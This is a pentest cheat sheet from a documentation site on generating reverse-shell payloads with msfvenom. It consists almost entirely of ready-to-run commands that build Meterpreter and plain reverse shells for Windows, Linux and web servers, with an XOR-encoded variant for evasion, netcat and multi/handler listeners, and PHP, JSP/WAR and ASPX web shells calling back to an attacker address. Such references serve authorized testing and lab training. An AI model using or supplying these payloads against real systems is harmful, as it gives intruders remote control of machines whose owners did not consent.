> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# MSFVENOM – Reverse Shell Cheat Sheet

> Payload generation with msfvenom for Windows, Linux, and web targets across multiple formats and architectures.

## Basic Syntax

```bash theme={"dark"}
msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <FILE>
```

### Common Options

| Option       | Description       |
| ------------ | ----------------- |
| `-p`         | Payload           |
| `LHOST`      | Attacker IP       |
| `LPORT`      | Listening port    |
| `-f`         | Output format     |
| `-o`         | Output file       |
| `-e`         | Encoder           |
| `-i`         | Encode iterations |
| `-b`         | Bad chars         |
| `--platform` | Force platform    |
| `-a`         | Architecture      |

***

## Listener

```bash theme={"dark"}
msfconsole
use exploit/multi/handler
set payload <PAYLOAD>
set LHOST <IP>
set LPORT <PORT>
run
```

***

## Windows Payloads

### Meterpreter (Recommended)

#### EXE

```bash theme={"dark"}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe
```

#### Staged HTTPS

```bash theme={"dark"}
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe
```

#### DLL

```bash theme={"dark"}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f dll -o shell.dll
```

#### ASPX

```bash theme={"dark"}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f aspx -o shell.aspx
```

#### HTA

```bash theme={"dark"}
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f hta-psh -o shell.hta
```

***

### Normal Shell

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe
```

Listener:

```bash theme={"dark"}
nc -lvnp 4444
```

***

### Encoded Payload

```bash theme={"dark"}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 \
-e x64/xor -i 10 -f exe -o shell.exe
```

***

## Linux Payloads

### Meterpreter ELF

```bash theme={"dark"}
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
```

***

### Normal Shell

```bash theme={"dark"}
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
```

Listener:

```bash theme={"dark"}
nc -lvnp 4444
```

***

### Python Payload

```bash theme={"dark"}
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.8 LPORT=4444 -f raw
```

The `cmd/unix/reverse_python` payload is a **shell one-liner** (it pipes a base64 stub into python), not Python source. Run it directly in a shell, not via `python3 -c`:

```bash theme={"dark"}
<PASTE PAYLOAD>
```

***

### Bash One-liner

```bash theme={"dark"}
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.8 LPORT=4444 -f raw
```

***

### PHP Webshell

```bash theme={"dark"}
msfvenom -p php/reverse_php LHOST=10.10.14.8 LPORT=4444 -o shell.php
```

Listener:

```bash theme={"dark"}
nc -lvnp 4444
```

***

## Web Payloads

| Language | Payload                                   |
| -------- | ----------------------------------------- |
| JSP      | `java/jsp_shell_reverse_tcp`              |
| WAR      | `java/jsp_shell_reverse_tcp -f war`       |
| PHP      | `php/reverse_php`                         |
| ASP      | `windows/meterpreter/reverse_tcp -f asp`  |
| ASPX     | `windows/meterpreter/reverse_tcp -f aspx` |

Example:

```bash theme={"dark"}
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war -o shell.war
```
